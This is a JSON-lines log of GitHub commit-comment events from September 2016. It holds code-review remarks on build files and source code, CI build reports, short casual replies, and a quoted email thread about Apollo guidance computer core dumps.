{"id":"4537396372","type":"CommitCommentEvent","actor":{"login":"thiagomanel"},"repo":{"name":"maas-ufcg/xclarity_client"},"payload":{"comment":{"id":18955506,"position":19,"line":26,"path":"lib/xclarity_client/xclarity_base.rb","commit_id":"ccb6c725af37c8de1b12fdef8ca09a9262e4efba","created_at":"2016-09-09T00:06:53Z","updated_at":"2016-09-09T00:06:53Z","body":"😄 "}},"created_at":"2016-09-09T00:06:53Z"}
{"id":"4537397066","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/vscode-debugadapter-extern"},"payload":{"comment":{"id":18955508,"position":10,"line":163,"path":"adapter/DebugSession.hx","commit_id":"ce4a20bd2f86f597302916adf0038910723e135d","created_at":"2016-09-09T00:07:08Z","updated_at":"2016-09-09T00:07:08Z","body":"i don't think `@:optional` makes sense for class fields"}},"created_at":"2016-09-09T00:07:08Z"}
{"id":"4537399024","type":"CommitCommentEvent","actor":{"login":"Robophil"},"repo":{"name":"Robophil/Product-Tour"},"payload":{"comment":{"id":18955513,"position":null,"line":null,"path":null,"commit_id":"126d082109c758f65a50916701e5b456e11dd9ae","created_at":"2016-09-09T00:07:43Z","updated_at":"2016-09-09T00:07:43Z","body":"I have that in mind. Working on other things too. Why don't we create a road map and see what needs to be done. Thoughts ? @theo4u "}},"created_at":"2016-09-09T00:07:43Z"}
{"id":"4537399648","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":18955516,"position":null,"line":null,"path":null,"commit_id":"111c57b393c56468d2aae506762c27a1160f17ca","created_at":"2016-09-09T00:07:54Z","updated_at":"2016-09-09T00:07:54Z","body":"++"}},"created_at":"2016-09-09T00:07:54Z"}
{"id":"4537403258","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18955526,"position":5,"line":6,"path":"src/System.Security.Cryptography.Csp/tests/System.Security.Cryptography.Csp.Tests.builds","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T00:08:58Z","updated_at":"2016-09-09T00:08:58Z","body":"We are currently treating the test projects a little different than the implementations, since for test projects we are keeping the previous TargetGroup being the default, and then just passing in netstandard1.7 if we want to test for netcoreapp1.1. What that means, is that in here you should only have something like:\r\n```xml\r\n<ItemGroup>\r\n    <Project Include=\"System.Security.Cryptography.Csp.Tests.csproj\">\r\n        <OSGroup>Windows_NT</OSGroup>\r\n    </Project>\r\n    <Project Include=\"System.Security.Cryptography.Csp.Tests.csproj\">\r\n        <TargetGroup>netstandard1.7</TargetGroup>\r\n        <TestTFMs>netcoreapp1.1</TestTFMs>\r\n        <OSGroup>Windows_NT</OSGroup>\r\n    </Project>\r\n  </ItemGroup>\r\n```"}},"created_at":"2016-09-09T00:08:58Z"}
{"id":"4537403605","type":"CommitCommentEvent","actor":{"login":"mjkkirschner"},"repo":{"name":"BogdanZavu/DynamoRevit"},"payload":{"comment":{"id":18955530,"position":null,"line":null,"path":null,"commit_id":"09e88031829aafdb034ad1fb8302959dacffd42c","created_at":"2016-09-09T00:09:04Z","updated_at":"2016-09-09T00:09:04Z","body":"@BogdanZavu lets update the branches - I don't think the testing has been done. I will move the task to dev and alert @jnealb to hold off testing until updated."}},"created_at":"2016-09-09T00:09:04Z"}
{"id":"4537405126","type":"CommitCommentEvent","actor":{"login":"sdgathman"},"repo":{"name":"hellerbarde/stapler"},"payload":{"comment":{"id":18955533,"position":null,"line":null,"path":null,"commit_id":"1eb0ca6ec99fc5f3e39342109b18f098d3ffe17d","created_at":"2016-09-09T00:09:33Z","updated_at":"2016-09-09T00:09:33Z","body":"[Commit c152bb7](https://github.com/hellerbarde/stapler/commit/c152bb7afe8dc52c9435698227c3a097663f2f1c#diff-1d3c64e3c3d420175ec4da112e680e5d)"}},"created_at":"2016-09-09T00:09:33Z"}
{"id":"4537410961","type":"CommitCommentEvent","actor":{"login":"xitaoque"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18955552,"position":null,"line":null,"path":null,"commit_id":"bbe95c2acf4df06a732ff319cd9c686440ddf29a","created_at":"2016-09-09T00:11:22Z","updated_at":"2016-09-09T00:11:22Z","body":"Does popN only works with iOS? Is there a plan to make it works with Android?"}},"created_at":"2016-09-09T00:11:22Z"}
{"id":"4537412362","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18955553,"position":6,"line":14,"path":"src/System.Security.Cryptography.Csp/tests/System.Security.Cryptography.Csp.Tests.csproj","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T00:11:47Z","updated_at":"2016-09-09T00:11:47Z","body":"First `<NugetTargetMoniker` is correct, but instead of the second one checking if TargetGroup is netstandard1.6, we should just simply set it to 1.3 in case it didn't get set on the previous line, like:\r\n```xml\r\n<NugetTargetMoniker Condition=\"'$(NugetTargetMoniker)'==''\">.NETStandard,Version=v1.3</NugetTargetMoniker>\r\n```"}},"created_at":"2016-09-09T00:11:47Z"}
{"id":"4537413486","type":"CommitCommentEvent","actor":{"login":"keyurtechy"},"repo":{"name":"keyurtechy/mattercenter"},"payload":{"comment":{"id":18955555,"position":null,"line":null,"path":null,"commit_id":"bffcb419fefe7c4fad6868aba66fa0e24f071990","created_at":"2016-09-09T00:12:07Z","updated_at":"2016-09-09T00:12:07Z","body":"to resolve bug \"View Document Details are not loading\""}},"created_at":"2016-09-09T00:12:07Z"}
{"id":"4537414357","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18955556,"position":13,"line":19,"path":"src/System.Security.Cryptography.Csp/tests/System.Security.Cryptography.Csp.Tests.csproj","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T00:12:23Z","updated_at":"2016-09-09T00:12:23Z","body":"We should be able to get rid of this once my PR goes in as well."}},"created_at":"2016-09-09T00:12:23Z"}
{"id":"4537415987","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18955563,"position":23,"line":60,"path":"src/System.Security.Cryptography.Csp/tests/System.Security.Cryptography.Csp.Tests.csproj","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T00:12:56Z","updated_at":"2016-09-09T00:12:56Z","body":"Same for these."}},"created_at":"2016-09-09T00:12:56Z"}
{"id":"4537420706","type":"CommitCommentEvent","actor":{"login":"piedoom"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18955577,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-09T00:14:30Z","updated_at":"2016-09-09T00:14:30Z","body":"I'd recommend that users keep comments in one comment instead of clustering several at a time;  it's difficult to read others' input.\r\n\r\nI don't really understand how Xkit factors into a diff, but I think Tumblr has made a few great usability changes as of late.  There's certainly much more that can be improved (as I still use Xkit myself) but I look forward to the future.  \r\n\r\n@rollership you might have better luck messaging Tumblr support.  I'm not sure this is the correct forum for the issues you're raising. "}},"created_at":"2016-09-09T00:14:30Z"}
{"id":"4537420858","type":"CommitCommentEvent","actor":{"login":"Opzon"},"repo":{"name":"marzika/Snapprefs"},"payload":{"comment":{"id":18955578,"position":null,"line":null,"path":null,"commit_id":"d91ba1992d2ca3255bb9bb0f87d3033e77e73485","created_at":"2016-09-09T00:14:33Z","updated_at":"2016-09-09T00:14:33Z","body":"thanks buddy <3 can't wait to get the update"}},"created_at":"2016-09-09T00:14:33Z"}
{"id":"4537422193","type":"CommitCommentEvent","actor":{"login":"ryanmartinneutrino"},"repo":{"name":"Queens-Physics/qexpy"},"payload":{"comment":{"id":18955583,"position":4,"line":549,"path":"qexpy/error.py","commit_id":"6051831fd49e884a797da5b8f92ced85ad8f9a05","created_at":"2016-09-09T00:15:01Z","updated_at":"2016-09-09T00:15:01Z","body":"One should only use \"is\" instead of \"==\" when comparing with None, otherwise, we should always use ==.\r\nhttp://stackoverflow.com/questions/3257919/what-is-the-difference-between-is-none-and-none"}},"created_at":"2016-09-09T00:15:01Z"}
{"id":"4537422986","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18955588,"position":null,"line":null,"path":null,"commit_id":"60ec043fa884f3ac07005b0da8ee997babc4cb48","created_at":"2016-09-09T00:15:15Z","updated_at":"2016-09-09T00:15:15Z","body":"input_processor_refactor (pshires) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-09T00:15:15Z"}
{"id":"4537424327","type":"CommitCommentEvent","actor":{"login":"wilg"},"repo":{"name":"videovillage/lattice.videovillage.co"},"payload":{"comment":{"id":18955596,"position":null,"line":null,"path":null,"commit_id":"0fee7c90b0a5f1f0dd6e6a80c2833abfc63e243a","created_at":"2016-09-09T00:15:39Z","updated_at":"2016-09-09T00:15:39Z","body":"What?"}},"created_at":"2016-09-09T00:15:39Z"}
{"id":"4537424968","type":"CommitCommentEvent","actor":{"login":"wilg"},"repo":{"name":"videovillage/lattice.videovillage.co"},"payload":{"comment":{"id":18955598,"position":null,"line":null,"path":null,"commit_id":"0fee7c90b0a5f1f0dd6e6a80c2833abfc63e243a","created_at":"2016-09-09T00:15:52Z","updated_at":"2016-09-09T00:15:52Z","body":"Just revert the revert commit if you want it back."}},"created_at":"2016-09-09T00:15:52Z"}
{"id":"4537428361","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18955607,"position":14,"line":20,"path":"src/System.Security.Cryptography.Csp/tests/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T00:17:04Z","updated_at":"2016-09-09T00:17:04Z","body":"Instead of doing all this, we should only have something like:\r\n```\r\n\"frameworks\": {\r\n    \"netstandard1.3\": {},\r\n    \"netstandard1.7\": {}\r\n  },\r\n```\r\nsince those are the only two frameworks we will build for, and you can add the Algorithms dependency back."}},"created_at":"2016-09-09T00:17:04Z"}
{"id":"4537428916","type":"CommitCommentEvent","actor":{"login":"gregcotten"},"repo":{"name":"videovillage/lattice.videovillage.co"},"payload":{"comment":{"id":18955609,"position":null,"line":null,"path":null,"commit_id":"0fee7c90b0a5f1f0dd6e6a80c2833abfc63e243a","created_at":"2016-09-09T00:17:15Z","updated_at":"2016-09-09T00:17:15Z","body":"I've already done it thanks much\n\nOn Thu, Sep 8, 2016 at 5:15 PM Wil Gieseler <notifications@github.com>\nwrote:\n\n> Just revert the revert commit if you want it back.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/videovillage/lattice.videovillage.co/commit/0fee7c90b0a5f1f0dd6e6a80c2833abfc63e243a#commitcomment-18955598>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA4bNp1VvE7kEQY0AY5YXY-FzoXUvLgcks5qoKU4gaJpZM4J4jhs>\n> .\n>\n"}},"created_at":"2016-09-09T00:17:15Z"}
{"id":"4537430160","type":"CommitCommentEvent","actor":{"login":"chuggafan"},"repo":{"name":"absurdlyobfuscated/RedditSharp"},"payload":{"comment":{"id":18955612,"position":null,"line":null,"path":null,"commit_id":"88d83cf6524e13fc727d2a23556bfa0616f6b351","created_at":"2016-09-09T00:17:42Z","updated_at":"2016-09-09T00:17:42Z","body":"You added non-async methods to the async method, can you please make them async? thanks"}},"created_at":"2016-09-09T00:17:42Z"}
{"id":"4537431081","type":"CommitCommentEvent","actor":{"login":"jglick"},"repo":{"name":"jenkinsci/config-file-provider-plugin"},"payload":{"comment":{"id":18955614,"position":null,"line":null,"path":null,"commit_id":"13fb076576195b17993e25429f11995405189f60","created_at":"2016-09-09T00:18:02Z","updated_at":"2016-09-09T00:18:02Z","body":"Nice. Do you plan to release this soon?\r\n\r\nBTW to make _Snippet Generator_ work best, fix `ManagedFile` so the `@DataBoundConstructor` contains only mandatory parameters—I guess `fileId` and `variable`—while `targetLocation` and `replaceTokens` are in `@DataBoundSetter`s. Also make sure you use `Util.fixEmpty` or otherwise fix the default values. See the dev guide."}},"created_at":"2016-09-09T00:18:02Z"}
{"id":"4537431826","type":"CommitCommentEvent","actor":{"login":"wilg"},"repo":{"name":"videovillage/lattice.videovillage.co"},"payload":{"comment":{"id":18955617,"position":null,"line":null,"path":null,"commit_id":"0fee7c90b0a5f1f0dd6e6a80c2833abfc63e243a","created_at":"2016-09-09T00:18:19Z","updated_at":"2016-09-09T00:18:19Z","body":"Not that you've pushed you haven't."}},"created_at":"2016-09-09T00:18:19Z"}
{"id":"4537433401","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":18955621,"position":7,"line":265,"path":"Application/LinkBubble/src/main/java/com/linkbubble/MainService.java","commit_id":"e54819247f48673ee837cf4f4ae7b141aa29a35d","created_at":"2016-09-09T00:18:55Z","updated_at":"2016-09-09T00:18:55Z","body":"I think this magic number might not be right for all conditions and might actually be a race conditions depending on what the device is doing and how fast/slow the device is.   Pls spend some time to try an alt solution first."}},"created_at":"2016-09-09T00:18:55Z"}
{"id":"4537433838","type":"CommitCommentEvent","actor":{"login":"gregcotten"},"repo":{"name":"videovillage/lattice.videovillage.co"},"payload":{"comment":{"id":18955622,"position":null,"line":null,"path":null,"commit_id":"0fee7c90b0a5f1f0dd6e6a80c2833abfc63e243a","created_at":"2016-09-09T00:19:05Z","updated_at":"2016-09-09T00:19:05Z","body":"Yea I'm working on it\n\nOn Thu, Sep 8, 2016 at 5:18 PM Wil Gieseler <notifications@github.com>\nwrote:\n\n> Not that you've pushed you haven't.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/videovillage/lattice.videovillage.co/commit/0fee7c90b0a5f1f0dd6e6a80c2833abfc63e243a#commitcomment-18955617>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA4bNkztW6h4beyKXlDbPzR9ldQRiw1Gks5qoKXLgaJpZM4J4jhs>\n> .\n>\n"}},"created_at":"2016-09-09T00:19:05Z"}
{"id":"4537436595","type":"CommitCommentEvent","actor":{"login":"wilg"},"repo":{"name":"videovillage/lattice.videovillage.co"},"payload":{"comment":{"id":18955628,"position":null,"line":null,"path":null,"commit_id":"0fee7c90b0a5f1f0dd6e6a80c2833abfc63e243a","created_at":"2016-09-09T00:20:08Z","updated_at":"2016-09-09T00:20:08Z","body":"This is a fun public spat!"}},"created_at":"2016-09-09T00:20:08Z"}
{"id":"4537437239","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18955632,"position":35,"line":40,"path":"src/System.Security.Cryptography.Csp/tests/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T00:20:22Z","updated_at":"2016-09-09T00:20:22Z","body":"you should have the full set of runtimes here even though you want the tests to only run in windows. They won't run in Unix either way because you are passing in an OSGroup in your test builds file so the tests in it will only run in Windows. This here is used to tell nuget that netcoreapp1.1 has a mapping to netstandard1.7 and that it runs in all of those RIDs.\r\nHere is the full list you need:\r\n```\r\n\"coreFx.Test.netcoreapp1.1-ns17\": {\r\n      \"netstandard1.7\": [\r\n        \"win7-x86\",\r\n        \"win7-x64\",\r\n        \"win10-arm64\",\r\n        \"osx.10.10-x64\",\r\n        \"centos.7-x64\",\r\n        \"debian.8-x64\",\r\n        \"rhel.7-x64\",\r\n        \"ubuntu.14.04-x64\",\r\n        \"ubuntu.16.04-x64\",\r\n        \"fedora.23-x64\",\r\n        \"linux-x64\",\r\n        \"opensuse.13.2-x64\"\r\n      ]\r\n    }\r\n```"}},"created_at":"2016-09-09T00:20:22Z"}
{"id":"4537437577","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":18955633,"position":6,"line":860,"path":"Application/LinkBubble/src/main/java/com/linkbubble/Settings.java","commit_id":"dc5f1f2fc66bc33a73eb0cd0e0efa3e82631eab1","created_at":"2016-09-09T00:20:28Z","updated_at":"2016-09-09T00:20:28Z","body":"let's say you have a redirectHost of google.com would it match a url like hellogoogle.com? maybe should only match hello.google.com but not hellogoogle.com?"}},"created_at":"2016-09-09T00:20:28Z"}
{"id":"4537442867","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":18955646,"position":null,"line":null,"path":null,"commit_id":"8f820d97aa0a5825954c48f9d96b98ac91a57083","created_at":"2016-09-09T00:22:12Z","updated_at":"2016-09-09T00:22:12Z","body":"++"}},"created_at":"2016-09-09T00:22:12Z"}
{"id":"4537444283","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":18955649,"position":null,"line":null,"path":null,"commit_id":"198aedd1f517aa4c9cf7f1efdc09bf79faa1699d","created_at":"2016-09-09T00:22:38Z","updated_at":"2016-09-09T00:22:38Z","body":"++"}},"created_at":"2016-09-09T00:22:38Z"}
{"id":"4537448368","type":"CommitCommentEvent","actor":{"login":"Lagg"},"repo":{"name":"DoctorMcKay/node-steamcommunity"},"payload":{"comment":{"id":18955660,"position":22,"line":306,"path":"components/confirmations.js","commit_id":"ce4d7ae026cd4bb978a350cd0db4b5d30f043442","created_at":"2016-09-09T00:24:08Z","updated_at":"2016-09-09T00:24:08Z","body":"Was this the offending line doing the 429s or is it applying to the page itself?"}},"created_at":"2016-09-09T00:24:08Z"}
{"id":"4537451314","type":"CommitCommentEvent","actor":{"login":"ajamil76"},"repo":{"name":"bip32JP/bip32JP.github.io"},"payload":{"comment":{"id":18955670,"position":261,"line":191,"path":"test_JP_BIP39.json","commit_id":"2ec91ad18196ed96596ac8a63fb6b6cd295973b0","created_at":"2016-09-09T00:25:13Z","updated_at":"2016-09-09T00:25:13Z","body":"Good BIP 39"}},"created_at":"2016-09-09T00:25:13Z"}
{"id":"4537452066","type":"CommitCommentEvent","actor":{"login":"DoctorMcKay"},"repo":{"name":"DoctorMcKay/node-steamcommunity"},"payload":{"comment":{"id":18955672,"position":22,"line":306,"path":"components/confirmations.js","commit_id":"ce4d7ae026cd4bb978a350cd0db4b5d30f043442","created_at":"2016-09-09T00:25:26Z","updated_at":"2016-09-09T00:25:26Z","body":"I'm not sure I follow. You are (were) getting 429s from the auto confirmation checker?"}},"created_at":"2016-09-09T00:25:26Z"}
{"id":"4537452778","type":"CommitCommentEvent","actor":{"login":"kamal"},"repo":{"name":"emberjs/ember.js"},"payload":{"comment":{"id":18955675,"position":3,"line":3,"path":"CHANGELOG.md","commit_id":"cb917916c9c69ad44e02905d7961f812b7aceab9","created_at":"2016-09-09T00:25:40Z","updated_at":"2016-09-09T00:25:40Z","body":"2012 typo on year "}},"created_at":"2016-09-09T00:25:40Z"}
{"id":"4537453178","type":"CommitCommentEvent","actor":{"login":"ajamil76"},"repo":{"name":"bip32JP/bip32JP.github.io"},"payload":{"comment":{"id":18955676,"position":null,"line":null,"path":null,"commit_id":"2ec91ad18196ed96596ac8a63fb6b6cd295973b0","created_at":"2016-09-09T00:25:49Z","updated_at":"2016-09-09T00:25:49Z","body":"Good BIP32"}},"created_at":"2016-09-09T00:25:49Z"}
{"id":"4537454520","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/fibervent"},"payload":{"comment":{"id":18955679,"position":null,"line":null,"path":null,"commit_id":"8e1af1891dc042a9860c1e3e245ab800b04bbb22","created_at":"2016-09-09T00:26:15Z","updated_at":"2016-09-09T00:26:15Z","body":"Amb aquest commit els testos no passen: \r\n![captura de pantalla 2016-09-09 a les 2 22 48](https://cloud.githubusercontent.com/assets/12971681/18371390/575b6186-7634-11e6-89b1-e76768a992d0.png)\r\nI si li dic:\r\n`$code = $awb->getWindmillBlade() ? '(S/N: ' . $awb->getWindmillBlade()->getCode() . ')' : '';`\r\nsi el codi és nul em pinta l'(S/N:)\r\nSeguiré pensant."}},"created_at":"2016-09-09T00:26:15Z"}
{"id":"4537457588","type":"CommitCommentEvent","actor":{"login":"chancancode"},"repo":{"name":"emberjs/ember.js"},"payload":{"comment":{"id":18955687,"position":3,"line":3,"path":"CHANGELOG.md","commit_id":"cb917916c9c69ad44e02905d7961f812b7aceab9","created_at":"2016-09-09T00:27:15Z","updated_at":"2016-09-09T00:27:15Z","body":"😂 "}},"created_at":"2016-09-09T00:27:15Z"}
{"id":"4537459973","type":"CommitCommentEvent","actor":{"login":"rwjblue"},"repo":{"name":"emberjs/ember.js"},"payload":{"comment":{"id":18955690,"position":3,"line":3,"path":"CHANGELOG.md","commit_id":"cb917916c9c69ad44e02905d7961f812b7aceab9","created_at":"2016-09-09T00:28:08Z","updated_at":"2016-09-09T00:28:08Z","body":"Lol. I went back in time!"}},"created_at":"2016-09-09T00:28:08Z"}
{"id":"4537465192","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18955696,"position":null,"line":null,"path":null,"commit_id":"60ec043fa884f3ac07005b0da8ee997babc4cb48","created_at":"2016-09-09T00:29:56Z","updated_at":"2016-09-09T00:29:56Z","body":"input_processor_refactor (pshires) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1847 of 2390 tests passed, 22 test warnings)\n\n * 508 tests had: AUD diffs.\n * 488 tests had: EIO diffs.\n * 470 tests had: Table big diffs.\n * 208 tests had: RDD diffs.\n * 144 tests had: ERR diffs.\n * 366 tests had: MTD diffs.\n * 270 tests had: DXF diffs.\n * 1 test had: ERR ...\n * 388 tests had: SHD diffs.\n * 406 tests had: BND diffs.\n * 293 tests had: MDD diffs.\n * 184 tests had: SSZ big diffs.\n * 14 tests had: ESO big diffs.\n * 9 tests had: MTR big diffs.\n * 8 tests had: ZSZ small diffs.\n * 28 tests had: ESO small diffs.\n * 22 tests had: MTR small diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: MDD ...\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-77.28%25-red.svg)</a> \n"}},"created_at":"2016-09-09T00:29:56Z"}
{"id":"4537465217","type":"CommitCommentEvent","actor":{"login":"eugeneko"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18955695,"position":null,"line":null,"path":null,"commit_id":"6895a512af350da0e053cd559bf4cbcaefd99329","created_at":"2016-09-09T00:29:56Z","updated_at":"2016-09-09T00:29:56Z","body":"Nice, thank you"}},"created_at":"2016-09-09T00:29:56Z"}
{"id":"4537466820","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18955699,"position":null,"line":null,"path":null,"commit_id":"fe6746d46de7344edc2fd5577ebd806a8a4e172c","created_at":"2016-09-09T00:30:25Z","updated_at":"2016-09-09T00:30:25Z","body":"I assume this is some legacy leftover? If I'm wrong, feel free to revert this."}},"created_at":"2016-09-09T00:30:25Z"}
{"id":"4537467478","type":"CommitCommentEvent","actor":{"login":"jelbourn"},"repo":{"name":"alexeagle/material2"},"payload":{"comment":{"id":18955700,"position":7,"line":65,"path":"src/lib/tooltip/tooltip.ts","commit_id":"f416635de53f01972d56b9241c9380b109370cf1","created_at":"2016-09-09T00:30:39Z","updated_at":"2016-09-09T00:30:39Z","body":"Just remove the `@`"}},"created_at":"2016-09-09T00:30:39Z"}
{"id":"4537468845","type":"CommitCommentEvent","actor":{"login":"jelbourn"},"repo":{"name":"alexeagle/material2"},"payload":{"comment":{"id":18955701,"position":4,"line":41,"path":"src/lib/menu/menu-item.ts","commit_id":"f416635de53f01972d56b9241c9380b109370cf1","created_at":"2016-09-09T00:31:06Z","updated_at":"2016-09-09T00:31:06Z","body":"Add `/** TODO: internal */`"}},"created_at":"2016-09-09T00:31:06Z"}
{"id":"4537469143","type":"CommitCommentEvent","actor":{"login":"slavapestov"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18955704,"position":8,"line":604,"path":"lib/AST/NameLookup.cpp","commit_id":"eefea8fae0b0d156a7ecf932b7c1eade45343228","created_at":"2016-09-09T00:31:09Z","updated_at":"2016-09-09T00:31:09Z","body":"nitpick: getSelfTypeInContext() returns the declared type for non-protocol contexts"}},"created_at":"2016-09-09T00:31:09Z"}
{"id":"4537477640","type":"CommitCommentEvent","actor":{"login":"alexeagle"},"repo":{"name":"alexeagle/material2"},"payload":{"comment":{"id":18955715,"position":null,"line":null,"path":null,"commit_id":"f416635de53f01972d56b9241c9380b109370cf1","created_at":"2016-09-09T00:34:13Z","updated_at":"2016-09-09T00:34:13Z","body":"done"}},"created_at":"2016-09-09T00:34:13Z"}
{"id":"4537479977","type":"CommitCommentEvent","actor":{"login":"Lagg"},"repo":{"name":"DoctorMcKay/node-steamcommunity"},"payload":{"comment":{"id":18955718,"position":22,"line":306,"path":"components/confirmations.js","commit_id":"ce4d7ae026cd4bb978a350cd0db4b5d30f043442","created_at":"2016-09-09T00:35:01Z","updated_at":"2016-09-09T00:35:01Z","body":"No, I was getting the 429 err.message in my own queued checker. My first assumption was that valve decided to start throttling the confirmations page itself. But going by this commit it seems they did it to whatever page getOfferID used to pull?"}},"created_at":"2016-09-09T00:35:01Z"}
{"id":"4537480423","type":"CommitCommentEvent","actor":{"login":"rburkey2005"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":18955719,"position":null,"line":null,"path":null,"commit_id":"aeafd6d522082041d34a2ef213d705f4c1d72c03","created_at":"2016-09-09T00:35:12Z","updated_at":"2016-09-09T00:35:12Z","body":"Okay, so my last post wasn't as clever as it might have been, and we'll \nhave to work out some way of handling it that will work for Onno as \nwell, but from my limited perspective it sounds like what you already \ncould certainly be worked with without any change.\n\nMy last post wasn't clever in another way, and that is, why does \nsomebody else need to weigh in on the core dumps?  Of course the core \ndumps would be useful and cool, and no additional opinions are needed.  \nPlus, they're not huge, and in the final analysis what conceivable harm \ncould be caused by having them?\n\nWhat I'm thinking is this:  We create a new \"branch\" in our GitHub repo \nto hold as many core-dumps as you like.  Call it, say, the \"scenarios\" \nbranch.  The idea is that people who download the main branch wouldn't \nget the cores, and people who downloaded the scenarios wouldn't get all \nthe other poo.  But obviously, anyone could download both, if they \nliked.  The \"scenarios\" branch would be organized by AGC program, so it \nwould have directories in it like\n\n     Artemis072/\n     Luminary131/\n     ...\n\nand in each of those directories, as many core dumps could be put as you \nliked.  The way I envisage it is that for each core dump, there would be \ntwo files:  the dump itself, with some descriptive name and (say) the \nextension .core, and a full description of it in a file with the same \nname and the extension (say) .readme.  So you might have, for example:\n\n     Luminary099/\n         LunarDescent.core\n         LunarDescent.readme\n         LunarAscent.core\n         LunarAscent.readme\n         Rendezvous.core\n         Rendezvous.readme\n         ... or whatever ...\n\nFrankly, I think you could even handle the pad loads the same way, with\n\n         PadLoads.core\n         PadLoads.readme\n\n-- Ron\n\nOn 09/08/2016 07:05 PM, indy91 wrote:\n>\n> Should be easy to convert our padload to something useful for you. The \n> usual format in the launch scenarios is:\n>\n> |CMPAD0110 1144\n> CMPAD1351 6510\n> CMPAD1352 7025\n> CMPAD1353 620\n> CMPAD1354 0\n> CMPAD1355 33260\n> CMPAD1706 0\n> CMPAD1707 20017\n> CMPAD1710 20501|\n>\n> You get the idea. Here a complete set, Apollo 11 in this case: \n> https://github.com/dseagrav/NASSP/blob/master/Scenarios/Project%20Apollo%20-%20NASSP/Broken%20Scenarios/Virtual%20AGC/Apollo%2011%20-%20LVDC%2B%2B%20Launch.scn\n>\n> Our padload will slight deviate from the actual padloads of course \n> because e.g. Orbiter only supports precession, but not nutation, so \n> the AGC doesn't need a correction angle for the Earth nutation. Also \n> our IMU is perfect, so there are no PIPA and IRIG compensation. That \n> kind of stuff.\n>\n> Our padload for Apollo 9, 11 and 15 are probably the most useful. We \n> don't use Colossus237 yet, so our Apollo 7 and 8 scenarios are also \n> using Colossus249. I guess it would be safe to use our Apollo 8 \n> padload for Colossus237, the differences between the versions is very \n> small.\n>\n> I guess we could record landing radar data, once it produces useful \n> information (not quite there yet). But they will of course be \n> generated in real time, and there will always be deviations in Orbiter \n> to the historical Apollo 11 trajectory.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/rburkey2005/virtualagc/commit/aeafd6d522082041d34a2ef213d705f4c1d72c03#commitcomment-18955497>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/ALSveMf39QWChKqxxbl1pNNLtA6bOHvjks5qoKLCgaJpZM4J4jch>.\n>\n\n"}},"created_at":"2016-09-09T00:35:12Z"}
